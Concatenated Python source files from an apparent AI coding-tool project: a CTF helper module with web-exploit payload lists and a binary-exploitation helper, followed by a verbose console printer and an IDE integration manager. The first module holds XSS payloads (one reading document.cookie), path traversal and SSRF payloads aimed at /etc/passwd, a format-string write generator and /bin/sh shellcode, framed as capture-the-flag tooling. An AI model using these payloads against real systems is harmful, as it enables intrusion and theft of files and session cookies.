        "<script>alert(1)</script>",
        "<img src=x onerror=alert(1)>",
        "<svg onload=alert(1)>",
        "javascript:alert(1)",
        "<body onload=alert(1)>",
        "'><script>alert(1)</script>",
        "\"><script>alert(1)</script>",
        "<img src=x onerror=alert(document.cookie)>",
    ]

    def __init__(self):
        """Initialize web exploiter."""
        self.mode2600 = get_mode2600()

    def get_sqli_payloads(self, context: str = "login") -> list[str]:
        """Get SQL injection payloads for context."""
        return self.SQLI_PAYLOADS.copy()

    def get_xss_payloads(self, context: str = "reflected") -> list[str]:
        """Get XSS payloads for context."""
        return self.XSS_PAYLOADS.copy()

    def generate_path_traversal(self, depth: int = 10, target: str = "/etc/passwd") -> list[str]:
        """
        Generate path traversal payloads.

        Args:
            depth: Maximum directory traversal depth
            target: Target file

        Returns:
            List of payloads
        """
        payloads = []

        for i in range(1, depth + 1):
            prefix = "../" * i
            payloads.append(prefix + target.lstrip("/"))
            # URL encoded
            payloads.append(prefix.replace("../", "%2e%2e%2f") + target.lstrip("/"))
            # Double URL encoded
            payloads.append(prefix.replace("../", "%252e%252e%252f") + target.lstrip("/"))

        return payloads

    def generate_ssrf_payloads(self, target: str = "127.0.0.1") -> list[str]:
        """
        Generate SSRF bypass payloads.

        Args:
            target: Target internal address

        Returns:
            List of payloads
        """
        payloads = [
            f"http://{target}/",
            f"http://localhost/",
            f"http://127.0.0.1/",
            f"http://0.0.0.0/",
            f"http://[::1]/",
            f"http://0177.0.0.1/",  # Octal
            f"http://2130706433/",  # Decimal
            f"http://127.1/",
            f"http://0/",
            f"http://{target}.nip.io/",
            f"gopher://{target}:80/_",
            f"file:///etc/passwd",
        ]

        return payloads


class ForensicsHelper:
    """
    Digital forensics utilities for CTF.

    Handles:
    - File type identification
    - Steganography detection
    - File carving
    - Metadata extraction
    """

    def __init__(self):
        """Initialize forensics helper."""
        self.mode2600 = get_mode2600()

    def identify_file(self, path: Path) -> dict[str, Any]:
        """
        Identify file type and properties.

        Args:
            path: Path to file

        Returns:
            Dict with file information
        """
        info = {
            "path": str(path),
            "size": path.stat().st_size if path.exists() else 0,
        }

        # File command
        if shutil.which("file"):
            result = subprocess.run(
                ["file", "-b", str(path)],
                capture_output=True,
                text=True,
            )
            info["type"] = result.stdout.strip()

        # Magic bytes
        try:
            with open(path, "rb") as f:
                magic = f.read(16)
            info["magic"] = magic.hex()
        except Exception:
            pass

        # Check for hidden data
        info["stego_hints"] = self._check_stego_hints(path)

        return info

    def _check_stego_hints(self, path: Path) -> list[str]:
        """Check for steganography hints."""
        hints = []

        try:
            with open(path, "rb") as f:
                data = f.read()

            # Check for appended data after file end markers
            if b"\xff\xd9" in data:  # JPEG end
                idx = data.rfind(b"\xff\xd9")
                if idx < len(data) - 2:
                    hints.append(f"Data after JPEG EOF marker ({len(data) - idx - 2} bytes)")

            if b"IEND" in data:  # PNG end
                idx = data.find(b"IEND")
                if idx > 0 and idx + 12 < len(data):
                    hints.append(f"Data after PNG IEND chunk")

            # Check for ZIP in file (common stego technique)
            if b"PK\x03\x04" in data[100:]:
                hints.append("Embedded ZIP file detected")

            # Check for strings that might be hidden
            if b"flag{" in data.lower() or b"ctf{" in data.lower():
                hints.append("Flag pattern found in raw data")

        except Exception:
            pass

        return hints

    def extract_metadata(self, path: Path) -> dict[str, Any]:
        """
        Extract metadata from file.

        Args:
            path: Path to file

        Returns:
            Dict with metadata
        """
        metadata = {}

        # Try exiftool
        if shutil.which("exiftool"):
            result = subprocess.run(
                ["exiftool", "-j", str(path)],
                capture_output=True,
                text=True,
            )
            try:
                import json
                data = json.loads(result.stdout)
                if data:
                    metadata = data[0]
            except Exception:
                pass

        return metadata

    def extract_strings_context(
        self,
        path: Path,
        min_length: int = 4,
        context: int = 20,
    ) -> list[dict]:
        """
        Extract strings with context.

        Args:
            path: Path to file
            min_length: Minimum string length
            context: Bytes of context around each string

        Returns:
            List of dicts with string and context
        """
        results = []

        try:
            with open(path, "rb") as f:
                data = f.read()

            # Find printable strings
            current_string = b""
            start_offset = 0

            for i, byte in enumerate(data):
                if 32 <= byte < 127:
                    if not current_string:
                        start_offset = i
                    current_string += bytes([byte])
                else:
                    if len(current_string) >= min_length:
                        results.append({
                            "string": current_string.decode("ascii"),
                            "offset": start_offset,
                            "context_before": data[max(0, start_offset - context):start_offset].hex(),
                            "context_after": data[start_offset + len(current_string):start_offset + len(current_string) + context].hex(),
                        })
                    current_string = b""

        except Exception:
            pass

        return results

    def binwalk_scan(self, path: Path) -> list[dict]:
        """
        Scan file with binwalk for embedded files.

        Args:
            path: Path to file

        Returns:
            List of found signatures
        """
        if not shutil.which("binwalk"):
            return []

        try:
            result = subprocess.run(
                ["binwalk", "-B", str(path)],
                capture_output=True,
                text=True,
            )

            signatures = []
            for line in result.stdout.split("\n")[3:]:
                if line.strip():
                    parts = line.split()
                    if len(parts) >= 3:
                        signatures.append({
                            "offset": parts[0],
                            "type": " ".join(parts[2:]),
                        })

            return signatures

        except Exception:
            return []


class PwnHelper:
    """
    Binary exploitation (pwn) utilities for CTF.

    Handles:
    - Buffer overflow padding calculation
    - ROP gadget finding
    - Format string exploitation
    - Shellcode generation
    """

    def __init__(self):
        """Initialize pwn helper."""
        self.mode2600 = get_mode2600()

    def cyclic_pattern(self, length: int) -> bytes:
        """
        Generate De Bruijn sequence for offset finding.

        Args:
            length: Pattern length

        Returns:
            Cyclic pattern bytes
        """
        charset = b"abcdefghijklmnopqrstuvwxyz"
        pattern = b""

        for a in charset:
            for b in charset:
                for c in charset:
                    for d in charset:
                        pattern += bytes([a, b, c, d])
                        if len(pattern) >= length:
                            return pattern[:length]

        return pattern[:length]

    def cyclic_find(self, pattern: bytes, value: int | bytes) -> int:
        """
        Find offset of value in cyclic pattern.

        Args:
            pattern: The cyclic pattern
            value: Value to find (as int or bytes)

        Returns:
            Offset or -1 if not found
        """
        if isinstance(value, int):
            # Convert int to little-endian bytes
            value = struct.pack("<I", value)

        return pattern.find(value)

    def find_rop_gadgets(self, binary_path: Path, gadget: str = "pop rdi") -> list[dict]:
        """
        Find ROP gadgets in binary.

        Args:
            binary_path: Path to binary
            gadget: Gadget pattern to search

        Returns:
            List of found gadgets
        """
        gadgets = []

        # Try ROPgadget
        if shutil.which("ROPgadget"):
            try:
                result = subprocess.run(
                    ["ROPgadget", "--binary", str(binary_path), "--filter", gadget],
                    capture_output=True,
                    text=True,
                    timeout=60,
                )

                for line in result.stdout.split("\n"):
                    if " : " in line:
                        parts = line.split(" : ")
                        gadgets.append({
                            "address": parts[0].strip(),
                            "gadget": parts[1].strip() if len(parts) > 1 else "",
                        })

            except Exception:
                pass

        # Try ropper
        elif shutil.which("ropper"):
            try:
                result = subprocess.run(
                    ["ropper", "-f", str(binary_path), "--search", gadget],
                    capture_output=True,
                    text=True,
                    timeout=60,
                )

                for line in result.stdout.split("\n"):
                    if "0x" in line:
                        gadgets.append({"raw": line.strip()})

            except Exception:
                pass

        return gadgets

    def format_string_payload(
        self,
        offset: int,
        address: int,
        value: int,
        bits: int = 64,
    ) -> bytes:
        """
        Generate format string write payload.

        Args:
            offset: Stack offset of format string
            address: Address to write to
            value: Value to write
            bits: 32 or 64 bit

        Returns:
            Format string payload
        """
        # Simplified format string payload
        # For actual exploitation, use pwntools

        if bits == 64:
            addr_bytes = struct.pack("<Q", address)
        else:
            addr_bytes = struct.pack("<I", address)

        # Basic %n write
        padding = value - len(addr_bytes)
        payload = addr_bytes + f"%{padding}c%{offset}$n".encode()

        return payload

    def shellcode_x64_execve(self) -> bytes:
        """
        Basic x86_64 /bin/sh shellcode.

        Returns:
            Shellcode bytes
        """
        # execve("/bin/sh", NULL, NULL)
        shellcode = (
            b"\x48\x31\xf6"              # xor rsi, rsi
            b"\x48\x31\xd2"              # xor rdx, rdx
            b"\x48\xbf\x2f\x62\x69\x6e"  # movabs rdi, 0x68732f6e69622f
            b"\x2f\x73\x68\x00"
            b"\x57"                       # push rdi
            b"\x48\x89\xe7"              # mov rdi, rsp
            b"\x48\x31\xc0"              # xor rax, rax
            b"\xb0\x3b"                  # mov al, 59
            b"\x0f\x05"                  # syscall
        )
        return shellcode

    def check_protections(self, binary_path: Path) -> dict[str, bool]:
        """
        Check binary security protections.

        Args:
            binary_path: Path to binary

        Returns:
            Dict of protection -> enabled
        """
        protections = {
            "nx": False,
            "pie": False,
            "canary": False,
            "relro": False,
        }

        # Try checksec
        if shutil.which("checksec"):
            try:
                result = subprocess.run(
                    ["checksec", "--file", str(binary_path)],
                    capture_output=True,
                    text=True,
                )

                output = result.stdout.lower()
                protections["nx"] = "nx enabled" in output
                protections["pie"] = "pie enabled" in output
                protections["canary"] = "canary found" in output
                protections["relro"] = "full relro" in output

            except Exception:
                pass

        return protections



"""
Verbose printing for RLM using rich. Modify this however you please :)
I was mainly using this for debugging, and a lot of it is vibe-coded.

Provides console output for debugging and understanding RLM execution.
Uses a "Tokyo Night" inspired color theme.
"""

from typing import Any

from rich.console import Console, Group
from rich.panel import Panel
from rich.rule import Rule
from rich.style import Style
from rich.table import Table
from rich.text import Text

from groknroll.core.types import CodeBlock, RLMIteration, RLMMetadata

# ============================================================================
# Tokyo Night Color Theme
# ============================================================================
COLORS = {
    "primary": "#7AA2F7",  # Soft blue - headers, titles
    "secondary": "#BB9AF7",  # Soft purple - emphasis
    "success": "#9ECE6A",  # Soft green - success, code
    "warning": "#E0AF68",  # Soft amber - warnings
    "error": "#F7768E",  # Soft red/pink - errors
    "text": "#A9B1D6",  # Soft gray-blue - regular text
    "muted": "#565F89",  # Muted gray - less important
    "accent": "#7DCFFF",  # Bright cyan - accents
    "bg_subtle": "#1A1B26",  # Dark background
    "border": "#3B4261",  # Border color
    "code_bg": "#24283B",  # Code background
}

# Rich styles
STYLE_PRIMARY = Style(color=COLORS["primary"], bold=True)
STYLE_SECONDARY = Style(color=COLORS["secondary"])
STYLE_SUCCESS = Style(color=COLORS["success"])
STYLE_WARNING = Style(color=COLORS["warning"])
STYLE_ERROR = Style(color=COLORS["error"])
STYLE_TEXT = Style(color=COLORS["text"])
STYLE_MUTED = Style(color=COLORS["muted"])
STYLE_ACCENT = Style(color=COLORS["accent"], bold=True)


def _to_str(value: Any) -> str:
    """Convert any value to string safely."""
    if isinstance(value, str):
        return value
    return str(value)


class VerbosePrinter:
    """
    Rich console printer for RLM verbose output.

    Displays beautiful, structured output showing the RLM's execution:
    - Initial configuration panel
    - Each iteration with response summaries
    - Code execution with results
    - Sub-calls to other models
    """

    def __init__(self, enabled: bool = True):
        """
        Initialize the verbose printer.

        Args:
            enabled: Whether verbose printing is enabled. If False, all methods are no-ops.
        """
        self.enabled = enabled
        self.console = Console() if enabled else None
        self._iteration_count = 0

    def print_header(
        self,
        backend: str,
        model: str,
        environment: str,
        max_iterations: int,
        max_depth: int,
        other_backends: list[str] | None = None,
    ) -> None:
        """Print the initial RLM configuration header."""
        if not self.enabled:
            return

        # Main title
        title = Text()
        title.append("◆ ", style=STYLE_ACCENT)
        title.append("RLM", style=Style(color=COLORS["primary"], bold=True))
        title.append(" ━ Recursive Language Model", style=STYLE_MUTED)

        # Configuration table
        config_table = Table(
            show_header=False,
            show_edge=False,
            box=None,
            padding=(0, 2),
            expand=True,
        )
        config_table.add_column("key", style=STYLE_MUTED, width=16)
        config_table.add_column("value", style=STYLE_TEXT)
        config_table.add_column("key2", style=STYLE_MUTED, width=16)
        config_table.add_column("value2", style=STYLE_TEXT)

        config_table.add_row(
            "Backend",
            Text(backend, style=STYLE_SECONDARY),
            "Environment",
            Text(environment, style=STYLE_SECONDARY),
        )
        config_table.add_row(
            "Model",
            Text(model, style=STYLE_ACCENT),
            "Max Iterations",
            Text(str(max_iterations), style=STYLE_WARNING),
        )

        if other_backends:
            backends_text = Text(", ".join(other_backends), style=STYLE_SECONDARY)
            config_table.add_row(
                "Sub-models",
                backends_text,
                "Max Depth",
                Text(str(max_depth), style=STYLE_WARNING),
            )
        else:
            config_table.add_row(
                "Max Depth",
                Text(str(max_depth), style=STYLE_WARNING),
                "",
                "",
            )

        # Wrap in panel
        panel = Panel(
            config_table,
            title=title,
            title_align="left",
            border_style=COLORS["border"],
            padding=(1, 2),
        )

        self.console.print()
        self.console.print(panel)
        self.console.print()

    def print_metadata(self, metadata: RLMMetadata) -> None:
        """Print RLM metadata as header."""
        if not self.enabled:
            return

        model = metadata.backend_kwargs.get("model_name", "unknown")
        other = list(metadata.other_backends) if metadata.other_backends else None

        self.print_header(
            backend=metadata.backend,
            model=model,
            environment=metadata.environment_type,
            max_iterations=metadata.max_iterations,
            max_depth=metadata.max_depth,
            other_backends=other,
        )

    def print_iteration_start(self, iteration: int) -> None:
        """Print the start of a new iteration."""
        if not self.enabled:
            return

        self._iteration_count = iteration

        rule = Rule(
            Text(f" Iteration {iteration} ", style=STYLE_PRIMARY),
            style=COLORS["border"],
            characters="─",
        )
        self.console.print(rule)

    def print_completion(self, response: Any, iteration_time: float | None = None) -> None:
        """Print a completion response."""
        if not self.enabled:
            return

        # Header with timing
        header = Text()
        header.append("◇ ", style=STYLE_ACCENT)
        header.append("LLM Response", style=STYLE_PRIMARY)
        if iteration_time:
            header.append(f"  ({iteration_time:.2f}s)", style=STYLE_MUTED)

        # Response content
        response_str = _to_str(response)
        response_text = Text(response_str, style=STYLE_TEXT)

        # Count words roughly
        word_count = len(response_str.split())
        footer = Text(f"~{word_count} words", style=STYLE_MUTED)

        panel = Panel(
            Group(response_text, Text(), footer),
            title=header,
            title_align="left",
            border_style=COLORS["muted"],
            padding=(0, 1),
        )
        self.console.print(panel)

    def print_code_execution(self, code_block: CodeBlock) -> None:
        """Print code execution details."""
        if not self.enabled:
            return

        result = code_block.result

        # Header
        header = Text()
        header.append("▸ ", style=STYLE_SUCCESS)
        header.append("Code Execution", style=Style(color=COLORS["success"], bold=True))
        if result.execution_time:
            header.append(f"  ({result.execution_time:.3f}s)", style=STYLE_MUTED)

        # Build content
        content_parts = []

        # Code snippet
        code_text = Text()
        code_text.append("Code:\n", style=STYLE_MUTED)
        code_text.append(_to_str(code_block.code), style=STYLE_TEXT)
        content_parts.append(code_text)

        # Stdout if present
        stdout_str = _to_str(result.stdout) if result.stdout else ""
        if stdout_str.strip():
            stdout_text = Text()
            stdout_text.append("\nOutput:\n", style=STYLE_MUTED)
            stdout_text.append(stdout_str, style=STYLE_SUCCESS)
            content_parts.append(stdout_text)

        # Stderr if present (error)
        stderr_str = _to_str(result.stderr) if result.stderr else ""
        if stderr_str.strip():
            stderr_text = Text()
            stderr_text.append("\nError:\n", style=STYLE_MUTED)
            stderr_text.append(stderr_str, style=STYLE_ERROR)
            content_parts.append(stderr_text)

        # Sub-calls summary
        if result.rlm_calls:
            calls_text = Text()
            calls_text.append(f"\n↳ {len(result.rlm_calls)} sub-call(s)", style=STYLE_SECONDARY)
            content_parts.append(calls_text)

        panel = Panel(
            Group(*content_parts),
            title=header,
            title_align="left",
            border_style=COLORS["success"],
            padding=(0, 1),
        )
        self.console.print(panel)

    def print_subcall(
        self,
        model: str,
        prompt_preview: str,
        response_preview: str,
        execution_time: float | None = None,
    ) -> None:
        """Print a sub-call to another model."""
        if not self.enabled:
            return

        # Header
        header = Text()
        header.append("  ↳ ", style=STYLE_SECONDARY)
        header.append("Sub-call: ", style=STYLE_SECONDARY)
        header.append(_to_str(model), style=STYLE_ACCENT)
        if execution_time:
            header.append(f"  ({execution_time:.2f}s)", style=STYLE_MUTED)

        # Content
        content = Text()
        content.append("Prompt: ", style=STYLE_MUTED)
        content.append(_to_str(prompt_preview), style=STYLE_TEXT)
        content.append("\nResponse: ", style=STYLE_MUTED)
        content.append(_to_str(response_preview), style=STYLE_TEXT)

        panel = Panel(
            content,
            title=header,
            title_align="left",
            border_style=COLORS["secondary"],
            padding=(0, 1),
        )
        self.console.print(panel)

    def print_iteration(self, iteration: RLMIteration, iteration_num: int) -> None:
        """
        Print a complete iteration including response and code executions.
        This is the main entry point for printing an iteration.
        """
        if not self.enabled:
            return

        # Print iteration header
        self.print_iteration_start(iteration_num)

        # Print the LLM response
        self.print_completion(iteration.response, iteration.iteration_time)

        # Print each code block execution
        for code_block in iteration.code_blocks:
            self.print_code_execution(code_block)

            # Print any sub-calls made during this code block
            for call in code_block.result.rlm_calls:
                self.print_subcall(
                    model=call.root_model,
                    prompt_preview=_to_str(call.prompt) if call.prompt else "",
                    response_preview=_to_str(call.response) if call.response else "",
                    execution_time=call.execution_time,
                )

    def print_final_answer(self, answer: Any) -> None:
        """Print the final answer."""
        if not self.enabled:
            return

        # Title
        title = Text()
        title.append("★ ", style=STYLE_WARNING)
        title.append("Final Answer", style=Style(color=COLORS["warning"], bold=True))

        # Answer content
        answer_text = Text(_to_str(answer), style=STYLE_TEXT)

        panel = Panel(
            answer_text,
            title=title,
            title_align="left",
            border_style=COLORS["warning"],
            padding=(1, 2),
        )

        self.console.print()
        self.console.print(panel)
        self.console.print()

    def print_summary(
        self,
        total_iterations: int,
        total_time: float,
        usage_summary: dict[str, Any] | None = None,
    ) -> None:
        """Print a summary at the end of execution."""
        if not self.enabled:
            return

        # Summary table
        summary_table = Table(
            show_header=False,
            show_edge=False,
            box=None,
            padding=(0, 2),
        )
        summary_table.add_column("metric", style=STYLE_MUTED)
        summary_table.add_column("value", style=STYLE_ACCENT)

        summary_table.add_row("Iterations", str(total_iterations))
        summary_table.add_row("Total Time", f"{total_time:.2f}s")

        if usage_summary:
            total_input = sum(
                m.get("total_input_tokens", 0)
                for m in usage_summary.get("model_usage_summaries", {}).values()
            )
            total_output = sum(
                m.get("total_output_tokens", 0)
                for m in usage_summary.get("model_usage_summaries", {}).values()
            )
            if total_input or total_output:
                summary_table.add_row("Input Tokens", f"{total_input:,}")
                summary_table.add_row("Output Tokens", f"{total_output:,}")

        # Wrap in rule
        self.console.print()
        self.console.print(Rule(style=COLORS["border"], characters="═"))
        self.console.print(summary_table, justify="center")
        self.console.print(Rule(style=COLORS["border"], characters="═"))
        self.console.print()



"""
Base IDE Integration Types and Manager

Provides common types and a unified manager for IDE integrations.
"""

import logging
from dataclasses import dataclass, field
from enum import Enum
from pathlib import Path
from typing import Any, Optional

logger = logging.getLogger(__name__)


class IDEType(Enum):
    """Supported IDE types"""

    VSCODE = "vscode"
    JETBRAINS = "jetbrains"
    VIM = "vim"
    NEOVIM = "neovim"
    EMACS = "emacs"
    SUBLIME = "sublime"
    ATOM = "atom"
    ZED = "zed"


@dataclass
class IDEConfig:
    """
    Base configuration for IDE integration

    Attributes:
        ide_type: Type of IDE
        project_root: Root directory of the project
        groknroll_path: Path to groknroll executable
        settings: IDE-specific settings
    """

    ide_type: IDEType
    project_root: Path
    groknroll_path: Optional[str] = None
    settings: dict[str, Any] = field(default_factory=dict)

    def __post_init__(self):
        """Resolve paths after initialization"""
        if isinstance(self.project_root, str):
            self.project_root = Path(self.project_root)
        self.project_root = self.project_root.resolve()


@dataclass
class IntegrationResult:
    """
    Result of an IDE integration operation

    Attributes:
        success: Whether the operation succeeded
        ide_type: Type of IDE that was integrated
        files_created: List of files created
        files_modified: List of files modified
        message: Status message
        error: Error message if failed
    """

    success: bool
    ide_type: IDEType
    files_created: list[Path] = field(default_factory=list)
    files_modified: list[Path] = field(default_factory=list)
    message: str = ""
    error: Optional[str] = None


class IntegrationManager:
    """
    Manager for IDE integrations

    Provides a unified interface for setting up IDE integrations
    across multiple editors.

    Example:
        manager = IntegrationManager(project_root=Path("/project"))

        # Setup VS Code
        result = manager.setup(IDEType.VSCODE)

        # Setup Neovim
        result = manager.setup(IDEType.NEOVIM)

        # List supported IDEs
        ides = manager.get_supported_ides()
    """

    def __init__(
        self,
        project_root: Optional[Path] = None,
        groknroll_path: Optional[str] = None,
    ):
        """
        Initialize IntegrationManager

        Args:
            project_root: Root directory of the project
            groknroll_path: Path to groknroll executable
        """
        self.project_root = (project_root or Path.cwd()).resolve()
        self.groknroll_path = groknroll_path or "groknroll"

    def setup(
        self,
        ide_type: IDEType,
        config: Optional[IDEConfig] = None,
        **kwargs,
    ) -> IntegrationResult:
        """
        Setup integration for an IDE

        Args:
            ide_type: Type of IDE to integrate
            config: Optional custom configuration
            **kwargs: Additional arguments passed to setup function

        Returns:
            IntegrationResult with status
        """
        from groknroll.ide.jetbrains import setup_jetbrains_integration
        from groknroll.ide.vim import setup_neovim_integration, setup_vim_integration
        from groknroll.ide.vscode import setup_vscode_integration

        if config is None:
            config = IDEConfig(
                ide_type=ide_type,
                project_root=self.project_root,
                groknroll_path=self.groknroll_path,
            )

        try:
            if ide_type == IDEType.VSCODE:
                return setup_vscode_integration(config, **kwargs)
            elif ide_type == IDEType.JETBRAINS:
                return setup_jetbrains_integration(config, **kwargs)
            elif ide_type == IDEType.VIM:
                return setup_vim_integration(config, **kwargs)
            elif ide_type == IDEType.NEOVIM:
                return setup_neovim_integration(config, **kwargs)
            else:
                return IntegrationResult(
                    success=False,
                    ide_type=ide_type,
                    error=f"Unsupported IDE type: {ide_type}",
                )
        except Exception as e:
            logger.error(f"Failed to setup {ide_type.value} integration: {e}")
            return IntegrationResult(
                success=False,
                ide_type=ide_type,
                error=str(e),
            )

    def detect_ide(self) -> list[IDEType]:
        """
        Detect which IDEs are configured in the project

        Returns:
            List of detected IDE types
        """
        detected = []

        # VS Code
        vscode_dir = self.project_root / ".vscode"
        if vscode_dir.exists():
            detected.append(IDEType.VSCODE)

        # JetBrains
        idea_dir = self.project_root / ".idea"
        if idea_dir.exists():
            detected.append(IDEType.JETBRAINS)

        # Vim/Neovim (check for local config)
        if (self.project_root / ".vim").exists():
            detected.append(IDEType.VIM)
        if (self.project_root / ".nvim").exists():
            detected.append(IDEType.NEOVIM)

        return detected

    def get_supported_ides(self) -> list[IDEType]:
        """
        Get list of supported IDEs

        Returns:
            List of supported IDE types
        """
        return [IDEType.VSCODE, IDEType.JETBRAINS, IDEType.VIM, IDEType.NEOVIM]

    def is_integrated(self, ide_type: IDEType) -> bool:
        """
        Check if an IDE is already integrated

        Args:
            ide_type: Type of IDE to check

        Returns:
            True if groknroll is configured for the IDE
        """
        if ide_type == IDEType.VSCODE:
            settings_file = self.project_root / ".vscode" / "settings.json"
            if settings_file.exists():
                content = settings_file.read_text()
                return "groknroll" in content.lower()
        elif ide_type == IDEType.JETBRAINS:
            idea_dir = self.project_root / ".idea"
            if idea_dir.exists():
                for xml_file in idea_dir.glob("*.xml"):
                    content = xml_file.read_text()
                    if "groknroll" in content.lower():
                        return True
        elif ide_type == IDEType.VIM:
            vimrc = Path.home() / ".vimrc"
            if vimrc.exists():
                content = vimrc.read_text()
                return "groknroll" in content.lower()
        elif ide_type == IDEType.NEOVIM:
            nvim_init = Path.home() / ".config" / "nvim" / "init.lua"
            if nvim_init.exists():
                content = nvim_init.read_text()
                return "groknroll" in content.lower()

        return False

    def remove(self, ide_type: IDEType) -> IntegrationResult:
        """
        Remove integration for an IDE

        Args:
            ide_type: Type of IDE to remove integration for

        Returns:
            IntegrationResult with status
        """
        # Implementation would remove groknroll-specific configurations
        # This is a placeholder for the actual removal logic
        return IntegrationResult(
            success=True,
            ide_type=ide_type,
            message=f"Removed {ide_type.value} integration",
        )
